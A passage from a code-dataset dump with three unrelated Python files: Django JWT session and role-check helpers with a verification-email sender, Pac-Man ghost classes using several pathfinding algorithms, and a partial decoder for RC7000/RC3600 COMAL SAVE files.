","repo_name":"manuel-dev04/recrutamento-22-23-2semestre","sub_path":"python/AdrianaNunes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9704,"program_lang":"python","lang":"pt","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"17072621472","text":"from django.utils.decorators import wraps\nfrom django.shortcuts import redirect\nfrom django.template.loader import render_to_string, get_template\nfrom django.template import Context\nfrom django.contrib import messages\nfrom cycloan.settings import SECRET_KEY\nfrom django.core.mail import EmailMultiAlternatives, send_mail\n\nfrom datetime import datetime, timedelta\nimport jwt\n\n\ndef verify_auth_token(func):\n @wraps(func)\n def wrapped(self, request, *args, **kwargs):\n auth_token = request.session.get('auth_token')\n\n if not auth_token:\n messages.warning(request, 'Session expired. Please log in again.')\n return redirect('index-view')\n \n try:\n auth_data = jwt.decode(auth_token, SECRET_KEY, algorithms=['HS256'])\n except:\n messages.warning(request, 'Session expired. Please log in again.')\n return redirect('index-view')\n\n return func(self, request, *args, **kwargs)\n \n return wrapped\n\n\ndef create_auth_token(user_id):\n auth_token = jwt.encode(\n {\n 'user_id': user_id,\n 'exp': datetime.now() + timedelta(seconds=600000)\n }, SECRET_KEY, algorithm='HS256'\n ).decode('utf-8')\n return auth_token\n\n\ndef check_customer(func):\n @wraps(func)\n def wrapped(self, request, *args, **kwargs):\n \n if request.session.get('user_type') == 'owner':\n messages.warning(request, 'You are not allowed to view that page.')\n return redirect('http-403-view')\n elif request.session.get('user_type') == 'admin':\n messages.warning(request, 'You are not allowed to view that page.')\n return redirect('http-403-view')\n\n return func(self, request, *args, **kwargs)\n return wrapped\n\n\ndef check_owner(func):\n @wraps(func)\n def wrapped(self, request, *args, **kwargs):\n \n if request.session.get('user_type') == 'customer':\n messages.warning(request, 'You are not allowed to view that page.')\n return redirect('http-403-view')\n elif request.session.get('user_type') == 'admin':\n messages.warning(request, 'You are not allowed to view that page.')\n return redirect('http-403-view')\n\n return func(self, request, *args, **kwargs)\n return wrapped\n\n\ndef create_verification_token(user_type, user_email, token_expiry):\n\n token = jwt.encode(\n {\n 'user_type': user_type,\n 'user_email': user_email,\n 'token_expiry': str(token_expiry)\n }, SECRET_KEY, algorithm='HS256'\n ).decode('utf-8')\n\n return token\n\n\ndef send_verification_email(to, user_name, user_type, verification_token):\n\n site_address = \"http://localhost:8000/\"\n verification_link = \"\".join([ site_address, \"email-verification/\", verification_token ]) \n\n context = {\n 'receiver_name': user_name,\n 'receiver_type': user_type,\n 'verification_link': verification_link\n }\n\n # html_content = render_to_string('email.html', context)\n html_content = get_template('core/email.html').render(context)\n text_content = str(html_content)\n\n subject = \"[CYCLOAN] Verify your email\"\n from_email = 'rabid@dhaka-ai.com'\n msg = EmailMultiAlternatives(subject, text_content, from_email, [to])\n msg.attach_alternative(html_content, \"text/html\")\n msg.send(fail_silently=False)\n\n # send_mail(\n # subject=\"Verify account\",\n # message=text_content,\n # from_email=from_email,\n # recipient_list=[to],\n # fail_silently=False,\n # html_message=html_content\n # )\n\n\n","repo_name":"fazledyn/cycloan","sub_path":"webapp/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12252440144","text":"import random\r\nimport pygame.time\r\nfrom algs import *\r\nfrom data_structures import *\r\nfrom settings import *\r\nfrom misc_classes import *\r\n\r\n\r\n\r\n\r\nclass Pacman(object):\r\n def __init__(self, node):\r\n '''\r\n :param node:\r\n '''\r\n self.colour = YELLOW\r\n self.radius = TILE_WIDTH // 2 # diameter fits into each individual tile which is 2r\r\n self.node = node # delegated as the parameter 'node' so that Pacman's position can be updated due to player input accordingly.\r\n self.pos = self.node.pos\r\n self.curr_direction = LEFT\r\n self.last_direction = self.curr_direction\r\n self.sheet_index = 0\r\n self.drawing_delay = 0\r\n\r\n\r\n\r\n def input(self):\r\n '''\r\n :return:\r\n '''\r\n keys = pygame.key.get_pressed() # check arrow keys or WASD for if they are pressed, return direction corresponding to each arrow key / WASD, if no keys are pressed return STOP (no movement\r\n if keys[pygame.K_RIGHT] or keys[pygame.K_d]:\r\n self.curr_direction = RIGHT # changes the current direction so that the pacman will continue to move in the same direction if there is no new key press. This matches real gameplay :)\r\n elif keys[pygame.K_LEFT] or keys[pygame.K_a]:\r\n self.curr_direction = LEFT\r\n elif keys[pygame.K_DOWN] or keys[pygame.K_s]:\r\n self.curr_direction = DOWN\r\n elif keys[pygame.K_UP] or keys[pygame.K_w]:\r\n self.curr_direction = UP\r\n return self.curr_direction # continues to move if no different key press..\r\n\r\n\r\n\r\n def update(self, generated_maze=False):\r\n '''\r\n :return:\r\n '''\r\n self.input()\r\n self.node = self.get_target_node(self.curr_direction, generated_maze)\r\n self.pos = self.node.pos\r\n\r\n if self.valid_direction(self.curr_direction, generated_maze):\r\n self.last_direction = self.curr_direction\r\n\r\n # update the new position of the player as the adjacent node in the direction of the player's choice.\r\n\r\n def draw(self, window):\r\n '''\r\n :param window:\r\n :return:\r\n '''\r\n center = (self.pos.x, self.pos.y - 4)\r\n self.drawing_delay += 1\r\n\r\n if self.sheet_index > 2:\r\n self.sheet_index = 0\r\n\r\n\r\n if self.last_direction == LEFT:\r\n window.blit(pacman_movingleft_sheet[self.sheet_index], center)\r\n\r\n\r\n elif self.last_direction == RIGHT:\r\n window.blit(pacman_movingright_sheet[self.sheet_index], center)\r\n\r\n\r\n elif self.last_direction == UP:\r\n window.blit(pacman_movingup_sheet[self.sheet_index], center)\r\n\r\n\r\n elif self.last_direction == DOWN:\r\n window.blit(pacman_movingdown_sheet[self.sheet_index], center)\r\n\r\n\r\n\r\n if self.drawing_delay > 3:\r\n self.sheet_index += 1\r\n self.drawing_delay = 0\r\n\r\n\r\n\r\n\r\n\r\n #return pygame.draw.circle(window, self.colour, center, self.radius)\r\n\r\n def valid_direction(self, direction, generated_maze): # validate the player's movement\r\n '''\r\n :param direction:\r\n :return:\r\n '''\r\n if direction is not STOP:\r\n if not generated_maze:\r\n if self.node.adjacent_nodes[direction] is not None: # if the player presses the arrow keys or WASD\r\n return True\r\n else:\r\n if self.node.walls[direction]: #CHECKS IF THERE ISNT A WALL IN THE WAY WHEN CONSIDERING MOVING THROUGH CELLS IN THE GENERATED MAZE.\r\n return True\r\n\r\n return False\r\n\r\n\r\n def get_target_node(self, direction, generated_maze):\r\n '''\r\n\r\n :param direction:\r\n :return:\r\n '''\r\n if self.valid_direction(direction, generated_maze): # if the player moves in a valid direction\r\n return self.node.adjacent_nodes[direction] # return the node that it is moving to as it new position\r\n\r\n elif self.valid_direction(self.last_direction, generated_maze):\r\n return self.node.adjacent_nodes[self.last_direction]\r\n\r\n else:\r\n return self.node\r\n\r\n\r\n\r\nclass Ghost(object):\r\n def __init__(self, node):\r\n '''\r\n :param node:\r\n :param frightened_sheet:\r\n :param eaten_sheet:\r\n '''\r\n self.colour = None\r\n self.node = node\r\n self.orientation = UP\r\n self.pos = self.node.pos\r\n self.modes = {'frightened': False, 'chase': False, 'scatter': False, 'eaten': False}\r\n self.directions = [UP, DOWN, LEFT, RIGHT, STOP]\r\n\r\n def reset_mode(self, curr):\r\n '''\r\n\r\n :param curr:\r\n :return:\r\n '''\r\n if curr == 1:\r\n update_dict = {'chase': True, 'frightened': False, 'scatter': False, 'eaten': False}\r\n self.modes.update(update_dict)\r\n\r\n elif curr == 2: # scatter\r\n update_dict = {'chase': False, 'frightened': False, 'scatter': True, 'eaten': False}\r\n self.modes.update(update_dict)\r\n\r\n elif curr == 3: # frightened\r\n update_dict = {'chase': False, 'frightened': True, 'scatter': False, 'eaten': False}\r\n self.modes.update(update_dict)\r\n\r\n elif curr == 4: # eaten\r\n update_dict = {'chase': False, 'frightened': False, 'scatter': False, 'eaten': True}\r\n self.modes.update(update_dict)\r\n\r\n\r\n def get_direction(self, target): # implementation of greedy best-first search for original ghost pathfinding\r\n '''\r\n :param target:\r\n :return:\r\n '''\r\n self.direction_list = [d for d in self.directions if self.valid_direction(d) and d != (self.orientation * -1)]\r\n directions = {direction: distance(self.node.adjacent_nodes[direction], target) for direction in self.direction_list}\r\n\r\n mins = [k for k, v in directions.items() if v == min(directions.values())] # creates a list of minimising directions (in terms of distance to target node) in the edge case there are multiple min values by selecting all the directions with the smallest distance and entering that into a list using list comprehension\r\n\r\n\r\n if UP in mins:\r\n self.orientation = UP # order of directions prioritised in the case there are multiple minimising directions (UP, LEFT, DOWN, RIGHT)\r\n return UP\r\n\r\n elif LEFT in mins:\r\n self.orientation = LEFT\r\n return LEFT\r\n\r\n elif DOWN in mins:\r\n self.orientation = DOWN\r\n return DOWN\r\n\r\n elif RIGHT in mins:\r\n self.orientation = RIGHT\r\n return RIGHT\r\n\r\n else:\r\n return STOP\r\n\r\n def chase(self, target): # need to find all calls of chase, scatter and frightened and pass temp_time, current_time or pygame.time.get_ticks()\r\n self.node = self.node.adjacent_nodes[self.get_direction(target)]\r\n self.pos = self.node.pos\r\n\r\n def scatter(self, home_node):\r\n self.node = self.node.adjacent_nodes[self.get_direction(home_node)]\r\n self.pos = self.node.pos\r\n\r\n def frightened(self):\r\n d = random.choice([d for d in self.directions if self.valid_direction(d) and d != (self.orientation * -1)])\r\n self.orientation = d\r\n self.node = self.node.adjacent_nodes[d]\r\n self.pos = self.node.pos\r\n\r\n def eaten(self):\r\n base = Node(14, 13)\r\n self.chase(base)\r\n if self.node.pos == base.pos:\r\n self.reset_mode(1)\r\n\r\n def collision(self, target):\r\n if self.pos == target.pos:\r\n return True\r\n return False\r\n\r\n def valid_direction(self, direction): #UPDATE THIS FOR CELLS.\r\n if direction is not STOP and self.node.adjacent_nodes[direction] is not None:\r\n return True\r\n return False\r\n\r\n\r\n def draw(self, window, sheet, frightened_nearly_up=False):\r\n position = (self.pos.x, self.pos.y - 2)\r\n if self.modes['chase'] == True or self.modes['scatter'] == True:\r\n if self.orientation == RIGHT:\r\n window.blit(sheet[0], position)\r\n\r\n elif self.orientation == LEFT:\r\n window.blit(sheet[1], position)\r\n\r\n elif self.orientation == UP:\r\n window.blit(sheet[2], position)\r\n\r\n elif self.orientation == DOWN:\r\n window.blit(sheet[3], position)\r\n\r\n\r\n elif self.modes['frightened'] == True:\r\n if not frightened_nearly_up: # need to edit with a timer to show flashing ghost when frightened nearly up\r\n window.blit(frightened_sheet[0], position)\r\n else:\r\n window.blit(frightened_sheet[1], position)\r\n\r\n elif self.modes['eaten'] == True:\r\n if self.orientation == RIGHT:\r\n window.blit(eaten_sheet[0], position)\r\n\r\n elif self.orientation == LEFT:\r\n window.blit(eaten_sheet[1], position)\r\n\r\n elif self.orientation == UP:\r\n window.blit(eaten_sheet[2], position)\r\n\r\n elif self.orientation == DOWN:\r\n window.blit(eaten_sheet[3], position)\r\n\r\n\r\n def draw_points(self, window, points, wall_colour):\r\n colours = [GREEN, RED, BLUE, PINK]\r\n if wall_colour in colours:\r\n del colours[colours.index(wall_colour)]\r\n colour = random.choice(colours) # random colour selection for bonus points\r\n print(points)\r\n points_text = pygame.font.SysFont('arial', 15).render(f\"{str(points)}\", True, colour)\r\n points_rect = points_text.get_rect(center=(self.pos.x + 10, self.pos.y - 10))\r\n\r\n window.blit(points_text, points_rect)\r\n\r\n\r\n\r\n\r\nclass Blinky(Ghost):\r\n def __init__(self, node):\r\n super().__init__(node)\r\n self.name = 'Blinky'\r\n self.colour = RED\r\n self.orientation = UP\r\n self.home = Node(0, COLUMNS - 1)\r\n self.reset_mode(2)\r\n self.sheet = blinky_sheet\r\n\r\n def update(self, player):\r\n if self.modes['chase']:\r\n self.chase(player.node)\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\n\r\n\r\n\r\nclass Pinky(Ghost):\r\n def __init__(self, node):\r\n super().__init__(node)\r\n self.name = 'Pinky'\r\n self.colour = PINK\r\n self.orientation = LEFT\r\n self.home = Node(0, 0)\r\n self.sheet = pinky_sheet\r\n self.reset_mode(2)\r\n\r\n\r\n\r\n def update(self, player):\r\n if self.modes['chase']:\r\n if player.curr_direction == UP:\r\n self.chase(Node(player.node.row - 4,player.node.col)) # for some reason allocating all this redundant code into a method doesnt work?\r\n elif player.curr_direction == DOWN:\r\n self.chase(Node(player.node.row + 4, player.node.col))\r\n elif player.curr_direction == LEFT:\r\n self.chase(Node(player.node.row, player.node.col - 4))\r\n elif player.curr_direction == RIGHT:\r\n self.chase(Node(player.node.row, player.node.col + 4))\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\nclass Clyde(Ghost):\r\n def __init__(self, node):\r\n super().__init__(node)\r\n self.name = 'Clyde'\r\n self.colour = ORANGE\r\n self.orientation = LEFT\r\n self.home = Node(ROWS - 1, 0)\r\n self.reset_mode(2)\r\n self.sheet = clyde_sheet\r\n\r\n\r\n def update(self, player):\r\n if self.modes['chase']:\r\n distance = total_distance(self.node, player)\r\n print(distance, \"-->\")\r\n if distance <= 8:\r\n self.scatter(self.home)\r\n print(\"scattering\")\r\n else:\r\n print(\"chasing\")\r\n if player.curr_direction == UP:\r\n n = Node(player.node.row - 4, player.node.col)\r\n self.chase(n)\r\n elif player.curr_direction == DOWN:\r\n n = Node(player.node.row + 4, player.node.col)\r\n self.chase(n)\r\n elif player.curr_direction == LEFT:\r\n n = Node(player.node.row, player.node.col - 4)\r\n self.chase(n)\r\n elif player.curr_direction == RIGHT:\r\n n = Node(player.node.row, player.node.col + 4)\r\n self.chase(n)\r\n\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\nclass Inky(Ghost):\r\n def __init__(self, node):\r\n super().__init__(node)\r\n self.name = 'Inky'\r\n self.colour = TEAL\r\n self.orientation = RIGHT\r\n self.home = Node(ROWS - 1, COLUMNS - 1)\r\n self.reset_mode(2)\r\n self.sheet = inky_sheet\r\n\r\n # based on the formula 2[(p+2) - b] + b where p is the player position, b is blinky's position and +2 denotes 2 spaces in front of the player dependent on current direction\r\n\r\n def update(self, player, blinky):\r\n if self.modes['chase']:\r\n if player.curr_direction == LEFT:\r\n pos = [(2 * (player.node.row - blinky.node.row)) + blinky.node.row,\r\n (2 * ((player.node.col - 2) - blinky.node.col)) + blinky.node.col]\r\n self.chase(Node(pos[0], pos[1]))\r\n\r\n elif player.curr_direction == RIGHT:\r\n pos = [(2 * (player.node.row - blinky.node.row)) + blinky.node.row,\r\n (2 * ((player.node.col + 2) - blinky.node.col)) + blinky.node.col]\r\n self.chase(Node(pos[0], pos[1]))\r\n\r\n elif player.curr_direction == DOWN:\r\n pos = [(2 * ((player.node.row + 2) - blinky.node.row)) + blinky.node.row,\r\n (2 * (player.node.col - blinky.node.col)) + blinky.node.col]\r\n self.chase(Node(pos[0], pos[1]))\r\n\r\n\r\n elif player.curr_direction == UP:\r\n pos = [(2 * ((player.node.row - 2) - blinky.node.row)) + blinky.node.row,\r\n (2 * (player.node.col - blinky.node.col)) + blinky.node.col]\r\n self.chase(Node(pos[0], pos[1]))\r\n\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\nclass AdvancedGhost(Ghost):\r\n def __init__(self, path_colour, node):\r\n super().__init__(node)\r\n self.path_colour = path_colour\r\n\r\n def move(self):\r\n print(self.curr_path_idx)\r\n self.node = self.path[self.curr_path_idx][0]\r\n self.orientation = self.path[self.curr_path_idx][1]\r\n self.node.colour = BLACK\r\n self.pos = self.node.pos\r\n self.curr_path_idx += 1\r\n\r\n def set_path_visible(self, window): #MAYBE CHANGE THIS SO THAT IF THE COLOUR OF THE PATH IS SET TO SOMETHING DIFFERENT THAN THE CURRENT MAZE COLOUR THEN DONT OVERRIDE.\r\n for node in self.path:\r\n if not node[0].is_path(): #IF NODE.COLOUR == BLACK\r\n node[0].colour = self.path_colour #node.colour = self.path_colour\r\n node[0].draw(window)\r\n\r\n def reset_path_colour(self):\r\n for node in self.path:\r\n node[0].colour = BLACK #node.colour = BLACK\r\n\r\n def reset(self):\r\n self.reset_path_colour()\r\n self.curr_path_idx = 0\r\n self.path = []\r\n\r\n\r\nclass SuperElroy(AdvancedGhost):\r\n def __init__(self, path_colour, node):\r\n super().__init__(path_colour, node)\r\n self.name = \"SuperElroy\"\r\n self.path_colour = LIGHT_GREEN\r\n self.orientation = UP\r\n self.home = Node(ROWS - 1, COLUMNS - 1)\r\n self.reset_mode(2)\r\n self.sheet = super_elroy_sheet\r\n self.path = []\r\n self.curr_path_idx = 0\r\n\r\n def update(self, player, window, graph, path_visible):\r\n if self.modes['chase']:\r\n if not self.path:\r\n self.path = self.get_path(player, graph)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n if self.curr_path_idx > len(self.path) - 1: #edit here so that all the nodes in the path return to their original colour, for now set this to blue. Also change current path index to 0\r\n self.reset()\r\n self.path = self.get_path(player, graph)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n self.move()\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\n\r\n def get_path(self, target, graph):\r\n path = Astar(self.node, target.node).run(graph)\r\n return path\r\n\r\n\r\n\r\nclass Brainless(AdvancedGhost): #make advanced ghost higher object which all these inherit from due to reusing methods.\r\n def __init__(self, path_colour, node):\r\n super().__init__(path_colour, node)\r\n self.name = \"Brainless\"\r\n self.orientation = LEFT\r\n self.sheet = brainless_sheet\r\n self.home = Node(0, COLUMNS-1)\r\n self.reset_mode(2)\r\n self.path = []\r\n self.curr_path_idx = 0\r\n self.path_colour = path_colour\r\n\r\n def update(self, player, window, path_visible):\r\n if self.modes['chase']:\r\n if not self.path:\r\n self.path = self.get_path(player)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n if self.curr_path_idx > len(self.path) - 1: #edit here so that all the nodes in the path return to their original colour, for now set this to blue. Also change current path index to 0\r\n self.reset()\r\n self.path = self.get_path(player)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n self.move()\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\n def get_path(self, target):\r\n return dls(self.node, target.node, limit=20)\r\n\r\n\r\n\r\n\r\n\r\nclass Patient(AdvancedGhost): #djisktra\r\n def __init__(self, path_colour, node):\r\n super().__init__(path_colour, node)\r\n self.name = \"Patient\"\r\n self.orientation = LEFT\r\n self.sheet = patient_sheet\r\n self.home = Node(ROWS-1, 0)\r\n self.reset_mode(2)\r\n self.path = []\r\n self.curr_path_idx = 0\r\n\r\n def update(self, player, window, graph, path_visible):\r\n if self.modes['chase']:\r\n if not self.path:\r\n self.path = self.get_path(player, graph)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n if self.curr_path_idx > len(self.path) - 1: #edit here so that all the nodes in the path return to their original colour, for now set this to blue. Also change current path index to 0\r\n self.reset()\r\n self.path = self.get_path(player, graph)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n self.move()\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\n\r\n def get_path(self, target, graph):\r\n path = Djikstra(self.node, target.node).run(graph, target)\r\n print(\"Dijkstra: \", path)\r\n return path[:10]\r\n\r\n\r\n\r\n\r\nclass Hurricane(AdvancedGhost): #TO BE TWEAKED: THE GENERAL IDEA IS TO HAVE SOME RADIUS, FOR NOW 10 TILES BEFORE A* SEARCH IS CALLED, AND OUTSIDE THIS RADIUS DFS IS CALLED.\r\n def __init__(self, path_colour, node):\r\n super().__init__(path_colour, node) #ALSO BUG FIX BECAUSE EATEN MODE DOESNT WORK HERE FOR SOME REASON\r\n self.name = \"Hurricane\"\r\n self.orientation = LEFT\r\n self.sheet = hurricane_sheet\r\n self.home = Node(0, 0)\r\n self.reset_mode(2)\r\n self.path = []\r\n self.curr_path_idx = 0\r\n\r\n def update(self, player, window, graph, path_visible):\r\n if self.modes['chase']:\r\n if not self.path:\r\n self.path = self.get_path(player, graph)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n if self.curr_path_idx > len(self.path) - 1: #edit here so that all the nodes in the path return to their original colour, for now set this to blue. Also change current path index to 0\r\n self.reset()\r\n self.path = self.get_path(player, graph)\r\n if path_visible:\r\n self.set_path_visible(window)\r\n self.move()\r\n\r\n else:\r\n self.move()\r\n\r\n elif self.modes['scatter']:\r\n self.scatter(self.home)\r\n\r\n elif self.modes['eaten']:\r\n self.eaten()\r\n\r\n\r\n def get_algorithm(self, target):\r\n if total_distance(self.node, target) <= 15:\r\n return \"Astar\"\r\n return \"DLS\"\r\n\r\n\r\n def get_path(self, target, graph):\r\n curr = self.get_algorithm(target)\r\n if curr == \"Astar\":\r\n return Astar(self.node, target.node).run(graph)\r\n\r\n elif curr == \"DLS\":\r\n return dls(self.node, target.node, limit=30)\r\n","repo_name":"ThomasMTurner/Pacman-Plus","sub_path":"entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":21805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70892909265","text":"'''\n RC7000/RC3600 COMAL SAVE files\n ------------------------------\n'''\n\nimport struct\n\nclass ComalSyntax(Exception):\n ''' COMAL syntax error '''\n\nTOPVAR = 0xdd\n\nCOMAL_TOKEN = {\n 0x0025: (0, \"DIGITS\", ),\n 0x0026: (0, \"RESET\", ),\n 0x0027: (0, \"PROTECT\", ),\n 0x0028: (0, \"LOWBOUND\", ),\n 0x0029: (0, \"CONNECT\", ),\n 0x002a: (0, \"RELEASE\", ),\n 0x002b: (0, \"DELAY\", ),\n 0x002c: (0, \"RENAME\", ),\n 0x002d: (1, \"TAB\", ),\n 0x002e: (0, \"PAGE\", ),\n 0x0030: (0, \"CREATE\", ),\n 0x0031: (0, \"DELETE\", ),\n 0x0032: (0, \"OF\", ),\n 0x0033: (0, \"ENDPROC\", ),\n 0x0034: (0, \"EXEC\", ),\n 0x0035: (0, \"PROC\", ),\n 0x0036: (0, \"ENDCASE\", ),\n 0x0037: (0, \"WHEN\", ),\n 0x0038: (0, \"CASE\", ),\n 0x0039: (0, \"ENDWHILE\", ),\n 0x003a: (0, \"ENDIF\", ),\n 0x003b: (0, \"UNTIL\", ),\n 0x003c: (0, \"REPEAT\", ),\n 0x003d: (0, \"WHILE\", ),\n 0x003e: (0, \"ELSE\", ),\n 0x003f: (0, \"DO\", ),\n 0x0041: (0, \"NEW\", ),\n 0x0042: (0, \"BYE\", ),\n 0x0043: (0, \"SAVE\", ),\n 0x0044: (0, \"ENTER\", ),\n 0x0045: (0, \"CHAIN\", ),\n 0x0046: (0, \"OPEN\", ),\n 0x0047: (0, \"CLOSE\", ),\n 0x0049: (0, \"RANDOMIZE\", ),\n 0x004a: (0, \"GOTO\", ),\n 0x004b: (0, \"GOSUB\", ),\n 0x004c: (0, \"IF\", ),\n 0x004d: (0, \"ON\", ),\n 0x004e: (0, \"CALL\", ),\n 0x004f: (0, \"STOP\", ),\n 0x0050: (0, \"DEF\", ),\n 0x0051: (0, \"END\", ),\n 0x0052: (0, \"RETURN\", ),\n 0x0053: (0, \"FOR\", ),\n 0x0054: (0, \"NEXT\", ),\n 0x0055: (0, \"DATA\", ),\n 0x0056: (0, \"REM\", ),\n 0x0057: (0, \"LET\", ),\n 0x0058: (0, \"MAT\", ),\n 0x0059: (0, \"DIM\", ),\n 0x005a: (0, \"RESTORE\", ),\n 0x005b: (0, \"INPUT\", ),\n 0x005c: (0, \"PRINT\", ),\n 0x005d: (0, \"READ\", ),\n 0x005e: (0, \"WRITE\", ),\n 0x005f: (1, \"ABS\", ),\n 0x0060: (1, \"SGN\", ),\n 0x0061: (1, \"RND\", ),\n 0x0062: (1, \"SQR\", ),\n 0x0063: (1, \"LOG\", ),\n 0x0064: (1, \"EXP\", ),\n 0x0065: (1, \"SIN\", ),\n 0x0066: (1, \"COS\", ),\n 0x0067: (1, \"ATN\", ),\n 0x0068: (1, \"TAN\", ),\n 0x0069: (1, \"DET\", ),\n 0x006a: (1, \"EOF\", ),\n 0x006b: (1, \"INT\", ),\n 0x006c: (1, \"SYS\", ),\n 0x006d: (1, \"ORD\", ),\n 0x006e: (1, \"CHR\", ),\n 0x0079: (1, \"LEN\", ),\n 0x007a: (0, \"TRN\", ),\n 0x007b: (5, \"INV\", ),\n 0x007c: (5, \"ZER\", ),\n 0x007d: (5, \"CON\", ),\n 0x007e: (5, \"IDN\", ),\n # 0x007f: (0, \"CONL\", ),\n # 0x0080: (0, \"RUN\", ),\n # 0x0081: (0, \"LIST\", ),\n # 0x0082: (0, \"SIZE\", ),\n # 0x0083: (0, \"AUTO\", ),\n # 0x0084: (0, \"RENUMBER\", ),\n # 0x0085: (0, \"RUNL\", ),\n # 0x0087: (0, \"BATCH\", ),\n # 0x0088: (0, \"SCRATCH\", ),\n # 0x0089: (0, \"LOAD\", ),\n # 0x008a: (0, \"EOJ\", ),\n # 0x008b: (0, \"TIME\", ),\n # 0x008d: (0, \"PUNCH\", ),\n # 0x0091: (0, \"INIT\", ),\n # 0x0092: (0, \"LOCK\", ),\n # 0x0093: (0, \"USERS\", ),\n # 0x0094: (0, \"LOOKUP\", ),\n # 0x0095: (0, \"COPY\", ),\n 0x00de: (0, \"FILE\", ),\n 0x00df: (0, \"ESC\", ),\n 0x00e0: (0, \"ERR\", ),\n 0x00e1: (0, \"USING\", ),\n 0x00e3: (2, \"OR\", ),\n 0x00e4: (0, \"TO\", ),\n 0x00e6: (0, \"STEP\", ),\n 0x00e7: (0, \"THEN\", ),\n 0x00e8: (2, \"AND\", ),\n 0x00ea: (1, \"<>\", ),\n 0x00eb: (1, \">\", ),\n 0x00ec: (1, \">=\", ),\n 0x00ed: (1, \"=\", ),\n 0x00ee: (1, \"<=\", ),\n 0x00ef: (1, \"<\", ),\n 0x00f0: (0, \";\", ),\n 0x00f1: (0, \",\", ),\n 0x00f2: (1, \"(\", ),\n 0x00f3: (1, \"(\", ),\n 0x00f6: (1, \")\", ),\n 0x00f7: (1, \")\", ),\n 0x00f8: (1, \"-\", ),\n 0x00f9: (1, \"+\", ),\n 0x00fa: (1, \"/\", ),\n 0x00fb: (1, \"*\", ),\n 0x00fc: (1, \"^\", ),\n 0x00fd: (2, \"MOD\", ),\n 0x00fe: (2, \"DIV\", ),\n 0x00ff: (2, \"NOT\", ),\n}\n\ndef isvar(n):\n ''' Does byte-string value represent a variable ? '''\n return 0x80 <= n <= TOPVAR\n\ndef get_token(n, flag=0):\n ''' Convert byte value to token, masked by flag '''\n token = COMAL_TOKEN.get(n)\n if token is None:\n return token\n if flag and not flag & token[0]:\n return None\n return token[1]\n\ndef number(b):\n ''' A floating point number (RCSL-43-GL-9698 2.5.1.1) '''\n i = struct.unpack(\">L\", bytes(b[:4]))[0]\n b.pop(0)\n b.pop(0)\n b.pop(0)\n b.pop(0)\n sign = -1 if i & (1<<31) else 1\n mantissa = (i & 0xffffff) / 2**24\n exponent = (i >> 24) & 0x07f\n value = sign * mantissa * 16**(exponent - 64)\n return \"%g\" % value\n\ndef string(b):\n ''' A String Constant '''\n assert b[0] == 0xe9\n b.pop(0)\n txt = '\"'\n length = b.pop(0)\n for _j in range(length):\n char = b.pop(0)\n glyph = {\n 0x22: \"<34>\",\n 0x3c: \"<60>\",\n 0x5b: \"Æ\",\n 0x5c: \"Ø\",\n 0x5d: \"Å\",\n 0x7b: \"æ\",\n 0x7c: \"ø\",\n 0x7d: \"å\",\n }.get(char)\n if glyph:\n txt += glyph\n elif 32 <= char <= 126:\n txt += \"%c\" % char\n else:\n txt += \"<%d>\" % char\n return txt + '\"'\n\n\nclass ComalStatement():\n ''' A single COMAL statement encode as byte sequence '''\n def __init__(self, up, lno, this):\n self.up = up\n self.lineno = lno\n self.this = this\n self.lvar = \"[LVAR]\"\n self.indent = 0\n self.outdent = 0\n\n def expect(self, stream, what):\n ''' Next byte should be token `what` '''\n tval = stream.pop(0)\n token = get_token(tval)\n if not token:\n raise ComalSyntax(\"Expected '%s' got 0x%02x'\" % (str(what), tval))\n if isinstance(what, str) and token != what:\n raise ComalSyntax(\"Expected '%s' got '%s'\" % (what, str(token)))\n if token not in what:\n raise ComalSyntax(\"Expected '%s' got '%s'\" % (str(what), str(token)))\n yield token\n\n def peek(self, stream, what):\n ''' Peek at next byte and see if it is token `what` '''\n tval = stream[0]\n token = get_token(tval)\n if not token:\n return False\n if isinstance(what, str) and token != what:\n return False\n if token not in what:\n return False\n stream.pop(0)\n return True\n\n def expect_comment(self, stream):\n ''' comment '''\n t = \"\"\n while stream and stream[0] != 0xe2:\n c = stream.pop(0)\n t += self.up.this.type_case.slugs[c].long\n yield t\n\n def expect_lineno(self, stream):\n ''' lineno '''\n if len(stream) & 1:\n stream.pop(0)\n lno = stream.pop(0) << 8\n lno |= stream.pop(0)\n yield \"%04d\" % lno\n\n def expect_string_expr(self, stream):\n ''' string_expr '''\n\n while stream and stream[0] != 0xe2:\n if stream[0] == 0xe9:\n yield string(stream)\n continue\n\n if isvar(stream[0]):\n yield from self.expect_var(stream)\n continue\n\n break\n\n def expect_expr(self, stream):\n ''' expr '''\n is_string = False\n parens = 0\n while stream:\n\n if stream[0] == 